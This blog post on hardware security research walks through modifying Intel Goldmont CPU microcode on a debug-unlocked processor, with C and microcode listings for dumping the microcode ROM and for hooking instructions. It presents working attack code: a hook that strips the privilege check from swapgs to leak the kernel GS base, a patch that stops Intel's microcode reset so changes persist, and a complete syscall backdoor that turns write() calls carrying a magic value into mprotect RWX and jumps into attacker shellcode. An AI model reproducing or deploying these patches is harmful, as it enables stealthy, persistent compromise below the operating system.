
Hardware Security Research: Building a Backdoor Inside a CPU Core

By Vectorize

Hello! In this exploit development and cybersecurity training blog, we will be exploring the depths of Intel SOC CPUs, conducting vulnerability research, and embedding a backdoor deep inside a CPU core by modifying the microcode that makes up the x86 instruction set. We will have a look at Intel’s microarchitecture for the Goldmont CPU series focusing on the Microcode Sequencer (MS).

We normally think of assembly instructions as atomic operations implemented directly in transistors and hardware. That is only partly true: modern CISC CPUs translate these "high-level" instructions into microcode instructions. Throughout this post we refer to the two levels as macro and micro instructions, respectively.

This post is an in-depth continuation of the talk I gave at Def Con 31. It is worth watching before reading, but not required. Talk and slides can be found here: Link

Prerequisites and Requirements

To reproduce any findings described throughout this blog post, one will need the following:

  1. A red unlocked Intel Goldmont CPU, preferably soldered to a dev board 🙂

  2. lib-micro

  3. build-essential (gcc, make, etc.)

  4. SPI flash programmer

  5. flashrom

During this research project, we used the UP Squared dev boards, which can be found here.

ONLY TESTED with the Intel® Pentium® N4200 CPU. To red unlock it, one can follow the instructions from IntelTXE-PoC with some modifications to the ROP chain, as we weren’t able to get the UP board to boot without them. The changes can be found at https://github.com/zanderdk/lib-micro/blob/master/bin/exploit.py. We also provide a pre-built image which already comes with an exploit for the Intel Management Engine.

To flash the board, hook up an SPI programmer as detailed in the coreboot docs and flash the pre-built image using the following command:


sudo flashrom --programmer ch341a_spi -w <path_to_image>

To test if the CPU is in a red unlocked state, we can try to write to the hidden enable bit for microarchitectural instructions using the wrmsr (write model-specific register) command line utility for Linux: sudo wrmsr --all 0x1e6 0x200. If we read back the same value using sudo rdmsr 0x1e6, the CPU is red unlocked and all cores have enabled the undocumented instructions for microcode debugging.
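The same read-back check can also be done from C. The following is a minimal sketch, assuming the Linux msr driver is loaded and exposes device nodes such as /dev/cpu/0/msr (the interface the rdmsr and wrmsr utilities rely on). The helper names msr_read and msr_roundtrip_ok are hypothetical and not part of lib-micro.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

/* Read one 64-bit MSR through a Linux msr device node such as /dev/cpu/0/msr.
 * Returns 0 on success and -1 on any failure (missing driver, no permission). */
static int msr_read(const char *dev_path, uint32_t reg, uint64_t *out) {
    assert(dev_path != NULL && out != NULL);
    int fd = open(dev_path, O_RDONLY);
    if (fd < 0)
        return -1;
    /* The msr driver interprets the file offset as the register number. */
    ssize_t n = pread(fd, out, sizeof(*out), (off_t)reg);
    close(fd);
    return n == (ssize_t)sizeof(*out) ? 0 : -1;
}

/* The check described above: the value written must read back unchanged. */
static int msr_roundtrip_ok(uint64_t written, uint64_t readback) {
    return written == readback;
}
```

After running the wrmsr command above, calling msr_read("/dev/cpu/0/msr", 0x1e6, &value) as root and passing the result to msr_roundtrip_ok(0x200, value) would mirror the manual rdmsr check for core 0.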

Debug Instructions

To access the microcode sequencer, we need write access to the control register bus (CRBUS). We gain this by unlocking the debug macro instructions, as described in this article by Mark Ermolov et al. In the lib-micro source, we find the following implementations of CRBUS reads and writes:


__attribute__((always_inline))

u_result_t static inline udbgrd(uint64_t type, uint64_t addr) {

    lmfence();

    u_result_t res;

    asm volatile(

        ".byte 0x0F, 0x0E\n\t" // udbg instruction for reading

        : "=d" (res.value)

        , "=b" (res.status)

        : "a" (addr)

        , "c" (type)

    );

    lmfence();

    return res;

}

__attribute__((always_inline))

u_result_t static inline udbgwr(uint64_t type, uint64_t addr, uint64_t value) {

    uint32_t value_low = (uint32_t)(value & 0xFFFFFFFF);

    uint32_t value_high = (uint32_t)(value >> 32);

    u_result_t res;

    lmfence();

    asm volatile(

        ".byte 0x0F, 0x0F\n\t" // udbg instruction for writing

        : "=d" (res.value)

        , "=b" (res.status)

        : "a" (addr)

        , "c" (type)

        , "d" (value_low)

        , "b" (value_high)

    );

    lmfence();

    return res;

}

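#define SIMPLERD(name, type) \
__attribute__((always_inline)) \
u64 static inline name(u64 addr) { \
    return (u64)udbgrd(type, addr).value; \
}

// SIMPLEWR is not shown in this excerpt; the definition below is an
// assumed counterpart to SIMPLERD built on udbgwr.
#define SIMPLEWR(name, type) \
__attribute__((always_inline)) \
void static inline name(u64 addr, u64 value) { \
    udbgwr(type, addr, value); \
}

SIMPLERD(crbus_read, 0x00) // reading crbus

SIMPLEWR(crbus_write, 0x00) // writing crbus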

Above, we define C macros for the read and write microarchitectural debug instructions. The rcx register selects the read/write mode, where 0x00 means the control register bus, and rax is the address to read from or write to. For writes, the data is passed in edx (low 32 bits) and ebx (high 32 bits); for reads, the result comes back in rdx with a status in rbx.
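To make the register split concrete, here is a small sketch of how a 64-bit value is divided into the two 32-bit halves, mirroring the value_low and value_high computation in udbgwr. The type udbg_data_t and the helper names are hypothetical and only serve the illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper type: the two 32-bit halves handed to the write instruction. */
typedef struct {
    uint32_t low;  /* placed in edx */
    uint32_t high; /* placed in ebx */
} udbg_data_t;

/* Split a 64-bit value the same way udbgwr does. */
static udbg_data_t udbg_split(uint64_t value) {
    udbg_data_t d;
    d.low = (uint32_t)(value & 0xFFFFFFFFu);
    d.high = (uint32_t)(value >> 32);
    return d;
}

/* Reassemble the original value from its halves. */
static uint64_t udbg_join(udbg_data_t d) {
    return ((uint64_t)d.high << 32) | d.low;
}

/* Sanity check: splitting and joining must be lossless. */
static void udbg_roundtrip_check(uint64_t value) {
    assert(udbg_join(udbg_split(value)) == value);
}
```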

The CRBUS connects internal components of the CPU. One of these is the Local Direct Access Test (LDAT), from which we can program and inspect various IP units. One of those units is the Microcode Sequencer, which has the port index 0x6a0. Below is the implementation from lib-micro for writing to the LDAT and MS:


void ldat_array_write(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {

    u64 prev = crbus_read(0x692); //disable CPU frontend

    crbus_write(0x692, prev | 1);

    crbus_write(pdat_reg + 1, 0x30000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf));

    crbus_write(pdat_reg, 0x000000 | (fast_addr & 0xffff));

    crbus_write(pdat_reg + 4, val & 0xffffffff);

    crbus_write(pdat_reg + 5, (val >> 32) & 0xffff);

    crbus_write(pdat_reg + 1, 0);

    crbus_write(0x692, prev); //enable CPU frontend

}

void ms_array_write(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {

    ldat_array_write(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr, val);

}

u64 ms_array_read(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {

    return ldat_array_read(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr); // ldat_array_read is implemented using microcode and explained later

}

LDAT is segmented into arrays, banks, words and addresses, but we will only focus on arrays and addresses, as the bank and word indices for the MS are always zero. The microcode ROM is stored in arrays 0 and 1, and the RAM in arrays 2 and 4. For a deeper understanding of these arrays, we refer to the lib-micro documentation.
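The selector word that ldat_array_write sends to pdat_reg + 1 packs these indices into 4-bit fields. The sketch below reproduces only that bit packing so it can be checked without hardware. The names LDAT_MODE_WRITE and ldat_select_word are hypothetical; the constant 0x30000 and the shifts are taken from the listing above.

```c
#include <assert.h>
#include <stdint.h>

#define LDAT_MODE_WRITE 0x30000u /* constant used by ldat_array_write above */

/* Pack the word, array and bank selectors into one LDAT selector word. */
static uint64_t ldat_select_word(uint64_t mode, uint64_t dword_idx,
                                 uint64_t array_sel, uint64_t bank_sel) {
    /* Each selector is a 4-bit field; wider inputs would be silently truncated. */
    assert(dword_idx <= 0xf && array_sel <= 0xf && bank_sel <= 0xf);
    return mode | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf);
}
```

For example, selecting array 4 with bank and word index zero gives ldat_select_word(LDAT_MODE_WRITE, 0, 4, 0) == 0x30400.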

Now we are at a point where we can start writing to the microcode RAM area:


void patch_ucode(u64 addr, ucode_t ucode_patch[], int n) { //write microcode patches

// format: uop0, uop1, uop2, seqword

// uop3 is fixed to a nop and cannot be overridden

    for (int i = 0; i < n; i++) {

// patch ucode

        ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+0, CRC_UOP(ucode_patch[i].uop0)); //write to array 4

        ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+1, CRC_UOP(ucode_patch[i].uop1));

        ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+2, CRC_UOP(ucode_patch[i].uop2));

// patch seqword

        ms_rw_seq_write(ucode_addr_to_patch_seqword_addr(addr) + i, CRC_SEQ(ucode_patch[i].seqw)); //write to array 2 (RW SEQ)

    }

}

The code above writes to MS RAM, which starts at address 0x7c00 and ends at 0x8000. For a detailed overview, look here.

Dumping Microcode

Let’s write some microcode! The first thing we are going to write will dump the microcode ROM area. In the code below, we use the macro language from lib-micro to assemble microcode.

Microcode is stored in triads, which are sets of three micro instructions under the control of a sequence word. The sequence word controls execution flow, but for this example we will only be using NOP_SEQWORD, which does nothing and continues execution in the following triad.
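Since patch_ucode steps through addresses in units of four (addr + i*4) and notes that the fourth slot is a fixed nop, a micro address can be read as a triad base plus a slot number. The following sketch illustrates that arithmetic under this assumption; the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Address of the first slot of the triad that contains addr. */
static uint64_t triad_base(uint64_t addr) {
    return addr & ~(uint64_t)3;
}

/* Slot inside the triad: 0..2 hold micro instructions, 3 is the fixed nop. */
static unsigned triad_slot(uint64_t addr) {
    return (unsigned)(addr & 3);
}

/* Address of triad number i in a patch that starts at base. */
static uint64_t triad_addr(uint64_t base, unsigned i) {
    assert(triad_slot(base) == 0); /* patches start on a triad boundary */
    return base + (uint64_t)i * 4;
}
```

This matches the address comments in the listings of this post: a patch at 0x7de0 has its second triad at 0x7de4, and the disassembly never shows addresses whose low two bits are both set.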

Microcode supports encoding immediate values, registers, addresses and macro aliases, but for now we will only be using regs and imms.

We annotate a destination register with D, operand registers with R and immediate values with I.

Example encoding:

  • MOVE_DSZ64_DR – moving from register to register and can be read as "move with data size of 64 bits with destination and operand register"

  • ZEROEXT_DSZ32_DI – setting a register to an immediate value and can be read as "Zero extend with data size of 32 bits with destination and immediate value"
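The naming convention can be decoded mechanically. The sketch below pulls the operand suffix off a macro name and translates the three letters introduced above. It covers only D, R and I; any other letter is reported as unknown. The function names are hypothetical and not part of lib-micro.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Return the operand suffix of a macro name, e.g. "DR" for "MOVE_DSZ64_DR". */
static const char *operand_suffix(const char *mnemonic) {
    assert(mnemonic != NULL);
    const char *underscore = strrchr(mnemonic, '_');
    return underscore ? underscore + 1 : "";
}

/* Translate one suffix letter into the operand kind it annotates. */
static const char *operand_kind(char letter) {
    switch (letter) {
    case 'D': return "destination register";
    case 'R': return "operand register";
    case 'I': return "immediate";
    default:  return "unknown";
    }
}
```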

In microcode, we have access to more than the normal x86 registers: we have 16 temporary registers named tmp0-tmp15, which are internal to the CPU core and hidden from the macro world.

For more details on how micro-operations are encoded, we again refer to the lib-micro documentation.

Microcode for implementing reading from the LDAT:


unsigned long addr = 0x7de0; //location in microcode RAM

ucode_t ucode_patch[] = { // Microcode implementation for reading from LDAT

    { // 0x7de0

    // grab arguments from macro world registers (RDI, RSI, RDX)

        MOVE_DSZ64_DR(TMP0, RDI), //move port id to TMP0

        MOVE_DSZ64_DR(TMP1, RSI), //array index

        MOVE_DSZ64_DR(TMP2, RDX), //address to read

        NOP_SEQWORD

    },

    { // 0x7de4

        ZEROEXT_DSZ32_DI(TMP10, 0x0),

        ADD_DSZ32_DRI(TMP11, TMP0, 0x1),

        ADD_DSZ32_DRI(TMP12, TMP0, 0x2),

        NOP_SEQWORD

    },

    { // 0x7de8

    // pause frontend

        MOVEFROMCREG_DSZ64_DI(TMP9, 0x38c),

        MOVETOCREG_DSZ64_RI(TMP10, 0x38c),

        MOVEFROMCREG_DSZ64_DR(TMP13, TMP11),

        NOP_SEQWORD

    },

    { // 0x7dec

        MOVETOCREG_DSZ64_RR(TMP1, TMP11),

        MOVETOCREG_DSZ64_RR(TMP2, TMP0),

        MOVEFROMCREG_DSZ64_DR(RAX, TMP12), //read resulting value from CRBUS

        NOP_SEQWORD

    },

    { // 0x7df0

        MOVETOCREG_DSZ64_RR(TMP10, TMP11),

        MOVETOCREG_DSZ64_RI(TMP9, 0x38c),

        NOP,

        END_SEQWORD

    },

};

The microcode above performs the same sequence of steps as the ldat_array_write implemented in C, except that the write is replaced by a read into the rax register. We can now include this code in our C project and start dumping the microcode ROM:
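Before placing a patch, it can be useful to check that it fits in the MS RAM window given earlier (0x7c00 to 0x8000) and does not collide with another patch. The sketch below does this bookkeeping for patches measured in triads. Treating 0x8000 as an exclusive upper bound is an assumption, and all names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define MS_RAM_START 0x7c00u /* start of MS RAM as stated in the text */
#define MS_RAM_END   0x8000u /* end of MS RAM as stated in the text (assumed exclusive) */

/* First address past a patch of n triads placed at addr. */
static uint64_t patch_end(uint64_t addr, unsigned n) {
    assert((addr & 3) == 0); /* patches start on a triad boundary */
    return addr + (uint64_t)n * 4;
}

/* True if the whole patch lies inside the MS RAM window. */
static int patch_fits(uint64_t addr, unsigned n) {
    return addr >= MS_RAM_START && patch_end(addr, n) <= MS_RAM_END;
}

/* True if two patches share at least one address. */
static int patches_overlap(uint64_t a, unsigned na, uint64_t b, unsigned nb) {
    return a < patch_end(b, nb) && b < patch_end(a, na);
}
```

The LDAT read patch above has five triads at 0x7de0, so it occupies 0x7de0 up to, but not including, 0x7df4.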


u64 ldat_array_read(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {

#include "ucode/ldat_read.h" //code from above

    patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch)); //insert the microcode patch at 0x7de0

    u64 array_bank_sel = 0x10000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf);

    u64 res = ucode_invoke_3(addr, pdat_reg, array_bank_sel, 0xc00000 | fast_addr);

    return res; // will contain the value of rax returned by microcode

}

Wait, how did we get a ucode_invoke_3 ?

Another feature of the undocumented udbgwr instruction is a microcode jump: if we place the value 0xd8 into rcx, the CPU treats rax as an address in the microcode ROM/RAM address space and jumps directly to that address. Using that information, we can construct a C function for invoking arbitrary microcode addresses as follows:


__attribute__((always_inline))

u64 static inline ucode_invoke_3(u64 addr, u64 arg1, u64 arg2, u64 arg3) {

    u64 rax = addr, rcx = 0xD8; //select ucode jump mode

    lmfence(); //memory fences for safety

    asm volatile(

        ".byte 0x0F, 0x0F\n\t" //magic udbgwr instruction

        : "+a" (rax)

        , "+c" (rcx)

        , "+D" (arg1) // rdi

        , "+S" (arg2) // rsi

        , "+d" (arg3) // rdx

        :

        : "rbx", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"

    );

    lmfence();

    return rax;

}

Now let’s dump it! All we have to do is read from the LDAT in a loop and print the value, and we can dump the microcode ROM and start analyzing:


void ms_array_dump(u64 array_sel, u64 fast_addr, u64 size) {

    for (; fast_addr < size; fast_addr+=4) { // loop & read

        u64 val0 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr);

        u64 val1 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+1);

        u64 val2 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+2);

        u64 val3 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+3);

        printf("%04lx: %012lx %012lx %012lx %012lx\n", fast_addr, val0, val1, val2, val3); //print result to stdout

    }

}

//implement wrapper for all the 5 MS arrays as described in lib-micro docs.

void ms_ro_code_dump(void){

    puts("array 00:");

    ms_array_dump(0, 0, 0x7e00);

}

void ms_ro_seqw_dump(void){

    puts("array 01:");

    ms_array_dump(1, 0, 0x8000);

}

void ms_rw_seqw_dump(void){

    puts("array 02:");

    ms_array_dump(2, 0, 0x80);

}

void ms_match_n_patch_dump(void){

    puts("array 03:");

    ms_array_dump(3, 0, 0x20);

}

void ms_rw_code_dump(void){

    puts("array 04:");

    ms_array_dump(4, 0, 0x200);

}
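Each line printed by ms_array_dump holds one address followed by four 12-digit hex words. The sketch below formats such a line into a buffer so the layout can be tested or parsed back without hardware. It uses the portable PRIx64 macros instead of %lx, and the function name format_dump_line is hypothetical.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Format one dump line: a 4-digit address followed by four 12-digit words.
 * Returns the number of characters snprintf would have written. */
static int format_dump_line(char *buf, size_t len, uint64_t addr, const uint64_t v[4]) {
    assert(buf != NULL && v != NULL);
    return snprintf(buf, len,
                    "%04" PRIx64 ": %012" PRIx64 " %012" PRIx64
                    " %012" PRIx64 " %012" PRIx64,
                    addr, v[0], v[1], v[2], v[3]);
}
```

A line produced this way can be read back with sscanf and the matching SCNx64 macros, which is handy when post-processing a saved dump.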

Woo, we now have a dump of the microcode ROM, and using uCodeDisasm we can disassemble the micro instructions into readable opcodes.

Hooking Instructions

With the microcode ROM dumped and disassembled, let’s have a look at how we can change behaviour and modify macro instructions. Another feature of the microcode sequencer is array three, which consists of 32 entries of match & patch registers. Through trial and error, we arrived at the following semantics for these registers.


The registers are divided into three bit fields: src and dst are two microcode addresses shifted right by one bit, and p is a present bit. In ucode_glm.txt we find the disassembled ROM extracted using the above methods. Let’s try to program a match & patch register to make a simple change. In labels.txt we find all the xlats (macro instruction entry points in MS ROM) we have identified so far, one of which is swapgs_xlat. This is the entry point of swapgs, the instruction that swaps the kernel and user-space values of the gs segment register:


swapgs_xlat:

U0870: 006302033200 tmp3:= READURAM(0x0002, 64) // read saved GS

U0871: 0c4b20372000 tmp2:= RDSEGFLD(GS, BASE) // read current GS

U0872: 100a02000200 TESTUSTATE(SYS, UST_USER_MODE)

01a711c0 ? SEQW GOTO generate_#GP

// bail if not in privileged mode, by jumping to Ucode generating

// General protection fault.

U0874: 0c7b2d000033 WRSEGFLD(tmp3, GS, BASE)

// write new effective GS

U0875: 204302000232 LFNCEMARK-> WRITEURAM(tmp2, 0x0002, 64)

// Save old GS

04808e72 SEQW GOTO lfence_wait_uend0

// Jump to Ucode for lfence instruction which also uend's the current

// macro instruction. We need this memory barrier as GS is a memory

// segmentation register.

In the microcode above, we also see a branch made from the sequence word. Encoded in the first sequence word is a branch to the microcode address U2711 == generate_#GP. Because the micro instruction selected by the uip (micro instruction pointer) encoded in the sequence word is a TESTUSTATE, the branch taken after executing U0872 becomes conditional on the test result.

Let’s program the following value into a match & patch register: (0x0874 >> 1) << 16 | (0x0872 >> 1) | 1 == 0x43A0439. This will put a hook on 0x872 and make it jump to 0x874. We can achieve this with the following C expression:


hook_match_and_patch(0, 0x872 /* src address */, 0x874 /* dst address */);
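The register value quoted above can be reproduced with a few lines of C. This sketch follows the formula exactly as written in the text and is not taken from the hook_match_and_patch implementation in lib-micro, which may encode the fields differently. The function name match_patch_value is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Compute a match & patch value from the formula in the text:
 * (dst >> 1) << 16 | (src >> 1) | 1, where the final 1 is the present bit. */
static uint32_t match_patch_value(uint32_t src, uint32_t dst) {
    /* The hooks shown in this post all use even micro addresses. */
    assert((src & 1) == 0 && (dst & 1) == 0);
    return ((dst >> 1) << 16) | (src >> 1) | 1u;
}
```

With src 0x872 and dst 0x874 this yields 0x43A0439, the value given above.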

Wooo, we changed swapgs from a privileged instruction to a user-space instruction by skipping the check. We can verify this by running:


uint rax = 0x0;

asm volatile( // Intel syntax, so build with -masm=intel

    "swapgs\n\t"

    "mov ax, gs\n\t"

    "swapgs\n\t"

    : "=a" (rax)

);

This will leak the kernel gs from user-space. We do the swap twice to not crash the kernel, by leaving kernel gs as it was. But if we put this in a big loop, we will start observing 0x0 after running for some time…

Hidden side-effect

Through a lot of digging and failed hooks, we discovered hidden side effects placed by Intel in the port IO macro instructions. These instructions will verify the microcode state and reset it if changes are detected. This is also why CustomProcessingUnit fails to persist microcode changes after booting Linux and will only persist them while still in a UEFI shell.

When we tried porting the repository to userspace, at first, nothing seemed to work. Then we realized that we were actually successful in applying a microcode update. It was just very quickly being overwritten with the original update again. After some experimenting, we found that this overwrite would not happen if we just kept the processor busy, and as soon as we made a long enough sleep call or exited the process, it would get overwritten.

We suspected that the overwrite was being done from within the microcode itself, and used this knowledge to trace the entire microcode ROM to create a list of candidate microcode addresses. We eventually traced it all the way down to the exact instruction that led our hook to be overwritten. We created a hook to dump the current value of RIP (macro instruction pointer) and found that the microcode in question was being called from the function acpi_idle_do_entry in the Linux kernel. Specifically, the in al, dx instruction triggered the code path. In the Linux kernel source code, the function is described as "acpi_idle_do_entry - enter idle state using the appropriate method". This matches our previous observations that the overwrites only happened when we let the processor idle. We then created a hook to completely skip that branch of the IN instruction, and our microcode was no longer being overwritten. The following code snippet will make all microcode changes persist:


void do_fix_IN_patch() {

// Patch U58ba to U017a

    hook_match_and_patch(0x1f, 0x58ba, 0x017a);

}

We will not include the full trace of the in instruction as it is huge, but it can be found in the ROM dump above.


// much microcode above

U58b4: 000100032cf2 tmp2:= OR_DSZ32(tmp2, tmp3)

U58b5: 00621d034200 tmp4:= MOVEFROMCREG_DSZ64(0x01d)

U58b6: 002501034234 tmp4:= SHR_DSZ32(tmp4, 0x00000001)

U58b8: 000400032d32 tmp2:= AND_DSZ32(tmp2, tmp4)

U58b9: 000700031c72 tmp1:= NOTAND_DSZ32(tmp2, tmp1)

U58ba: 01507a040231 LFNCEMARK-> UJMPCC_DIRECT_NOTTAKEN_CONDZ(tmp1, U017a)

// force the branch above using match & patch register ^^^^^^^^^^^^^^^^^^^^^

U58bc: 00010003c000 tmp12:= OR_DSZ32(0x00000000)

U58bd: 00ed04030230 tmp0:= ROR_DSZ8(tmp0, 0x00000004)

U58be: 00c001030230 tmp0:= ADD_DSZ8(tmp0, 0x00000001)

U58c0: 002408034230 tmp4:= SHL_DSZ32(tmp0, 0x00000008)

U58c1: 00040f030c08 tmp0:= AND_DSZ32(0x0000000f, tmp0)

U58c2: 000502032c08 tmp2:= SUB_DSZ32(0x00000002, tmp0)

U58c4: 0352d06002b2 LFNCEWTMRK-> UJMPCC_DIRECT_NOTTAKEN_CONDLE(tmp2, U58d0)

U58c5: 2d0bc8031008 tmp1:= PORTIN_DSZ32_ASZ16_SC1(0x00c8)

U58c6: 002510031231 tmp1:= SHR_DSZ32(tmp1, 0x00000010)

// much microcode below

Writing a Backdoor

Now for the fun part, let’s hide a backdoor in the instruction set!

There are a lot of instructions in the x86 instruction set. Many of them are implemented in microcode, which lets us hook them. Utilizing the fact that all browsers cache files such as images downloaded from websites, we hook the syscall instruction and watch for a write syscall being run. If the data contains our magic value, we change the syscall to mprotect, making the data RWX, and then execute the data as shellcode.

Syscall

Before diving deep into the backdoor, let’s have a quick look at the implementation of the syscall instruction from microcode:


syscall_xlat:

U02e0: 000b01833200 tmp3:= UPDATEUSTATE(!0x04)

U02e1: 006384034200 LFNCEMARK-> tmp4:= READURAM(0x0084, 64) // IA32_LSTAR?

U02e2: 006382031200 tmp1:= READURAM(0x0082, 64) // IA32_LSTAR?

048bb296 SEQW SAVEUIP1 U02e4

SEQW GOTO U0bb2

U02e4: 006520030230 tmp0:= SHR_DSZ64(tmp0, 0x00000020)

U02e5: 008703030c08 tmp0:= NOTAND_DSZ16(0x00000003, tmp0)

U02e6: 004804821008 rcx:= ZEROEXT_DSZ64(IMM_MACRO_ALIAS_RIP)

// Store the address of the next user-space instruction into rcx. ^^^^

0181d280 SEQW GOTO U01d2

The Intel manual opens its description of syscall with the following:

SYSCALL invokes an OS system-call handler at privilege level 0. It does so by loading RIP from the IA32_LSTAR MSR (after saving the address of the instruction following SYSCALL into RCX). (The WRMSR instruction ensures that the IA32_LSTAR MSR always contain a canonical address.)

This is exactly what we also read from the microcode implementation. Keep this in mind, as it becomes important later.

Implementation

Below is the full implementation of the backdoor used in our demo at Def Con 31, which we will try to explain step by step using comments. A more readable pseudocode version can be found in our slides as well.


unsigned long addr = 0x7d30; // Ucode RAM address where we place ucode

unsigned long hook_address = 0x02e0; // syscall_xlat (syscall entry point)

ucode_t ucode_patch[] = {

    { // 0x0

        XOR_DSZ64_DRI(TMP5, RAX, 0x1), // check RAX for SYS_WRITE

        UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),

        XOR_DSZ64_DRI(TMP5, RAX, 0x12),

        // check RAX for pwrite64 a variant of SYS_WRITE

        NOP_SEQWORD

    },

    { // 0x4

        UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),

        UJMP_I(addr+0x2c),

        UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(RSI, addr+0x2c),

        // check RSI is not 0x0 and if not assume to be a valid pointer

        NOP_SEQWORD

    },

    { // 0x8

        ZEROEXT_DSZ64_DI(TMP6, 0xd00d),

        CONCAT_DSZ16_DRI(TMP6, TMP6, 0xf00d), //put 0xd00df00d into TMP6

        ADD_DSZ64_DRI(TMP4, RSI, 0xd8), // tmp4 = rsi + 0xd8

        NOP_SEQWORD

    },

    { // 0xc

        LDZX_DSZ64_ASZ32_SC1_DR(TMP5, TMP4, 0x18), //read magic value from memory

        XOR_DSZ64_DRR(TMP5, TMP5, TMP6), //check if we found magic in image data

        UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x2c), // bail out if not

        NOP_SEQWORD

    },

    { // 0x10

        // Save regs

        // We now save the current register state to memory/image data.

        // This is done so we can recover the execution state from memory when

        // we finally achieve macro level shellcode.

        ZEROEXT_DSZ64_DM(TMP5, IMM_MACRO_ALIAS_RIP),

        SUB_DSZ64_DIR(TMP5, 0x2, TMP5),

        STAD_DSZ64_ASZ32_SC1_RRI(TMP5, TMP4, 0x0, SEG_DS),

        NOP_SEQWORD

    },

    { // 0x14

        STAD_DSZ64_ASZ32_SC1_RRI(RAX, TMP4, 0x8, SEG_DS),

        STAD_DSZ64_ASZ32_SC1_RRI(RDI, TMP4, 0x10, SEG_DS),

        STAD_DSZ64_ASZ32_SC1_RRI(RSI, TMP4, 0x18, SEG_DS),

        NOP_SEQWORD

    },

    { // 0x18

        STAD_DSZ64_ASZ32_SC1_RRI(RDX, TMP4, 0x20, SEG_DS),

        NOP,

        // Overwrite regs

        // now we modify the register state to prepare a mprotect syscall.

        ADD_DSZ64_DRI(TMP5, RSI, 0x100), // jmp rsi+0x100

        // ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^

        // We calculate an address into the image data where we have put

        // shellcode and save it to TMP5.

        NOP_SEQWORD

    },

    { // 0x1c

        // Now we setup arguments for syscall to do an mprotect instead of

        // intended write syscall:

        // int mprotect(void *addr, size_t len, int prot);

        SUB_DSZ64_DIR(RDI, 0x1000, 0),

        AND_DSZ64_DRR(RDI, RDI, RSI), // rdi = rsi & ~0xfff, first argument

        // We set addr to rsi & ~0xfff for page alignment.

        // This is the area we want to be RWX

        ZEROEXT_DSZ64_DI(RSI, 0x2000), // rsi = 0x2000, size

        NOP_SEQWORD

    },

    { // 0x20

        ZEROEXT_DSZ64_DI(RDX, 0x7), // rdx = PROT_READ | PROT_WRITE | PROT_EXEC == 0x7

        // above we set the new memory protection flags

        ZEROEXT_DSZ64_DI(RAX, 0xa), // rax = mprotect

        // finally we change the syscall from a SYS_WRITE to a SYS_MPROTECT

        UJMP_I(addr+0x2d),

        NOP_SEQWORD

    },

    { // 0x24

        UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x26),

        UJMP_I(addr+0x28),

        MOVE_DSZ64_DR(RCX, TMP5),

        // ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^

        // This is the final trick!

        // Change the return address of the syscall instruction stored in RCX.

        // This will make the kernel "think" it should return to our shellcode

        // after handling an MPROTECT! of the same area.

        SEQ_GOTO2(addr+0x29) | SEQ_NOSYNC

    },

    { // 0x28

        ZEROEXT_DSZ64_DM(RCX, IMM_MACRO_ALIAS_RIP),

        SHR_DSZ64_DRI(TMP0, TMP0, 0x20),

        NOTAND_DSZ16_DIR(TMP0, 0x3, TMP0),

        SEQ_GOTO2(0x1d2) | SEQ_NOSYNC

    },

    { // 0x2c Execute first few instructions in normal syscall

        XOR_DSZ64_DRR(TMP5, TMP5, TMP5),

        UPDATEUSTATE_NOT_I(0x1) | DST_ENCODE(TMP3),

        READURAM_DI(TMP4, 0x84),

        SEQ_GOTO2(0x2e2) | SEQ_NOSYNC

    }

};
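The immediates in the patch above can be cross-checked against the Linux headers, and the page arithmetic can be verified in isolation. The sketch below assumes an x86-64 Linux build environment (the syscall number checks are compiled out elsewhere). It only models the address arithmetic from the comments; all function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>

/* Page-aligned base passed to mprotect: rdi = rsi & ~0xfff. */
static uint64_t mprotect_base(uint64_t rsi) {
    return rsi & ~(uint64_t)0xfff;
}

/* True if the entry point rsi + 0x100 lies inside the 0x2000-byte window. */
static int entry_in_window(uint64_t rsi) {
    uint64_t base = mprotect_base(rsi);
    uint64_t entry = rsi + 0x100;
    return entry >= base && entry < base + 0x2000;
}

/* Compare the immediates used in the patch with the platform headers. */
static void check_patch_immediates(void) {
#if defined(__linux__) && defined(__x86_64__)
    assert(SYS_write == 0x1);     /* first XOR against RAX */
    assert(SYS_pwrite64 == 0x12); /* second XOR against RAX */
    assert(SYS_mprotect == 0xa);  /* value written to RAX */
    assert((PROT_READ | PROT_WRITE | PROT_EXEC) == 0x7); /* value written to RDX */
#endif
}
```

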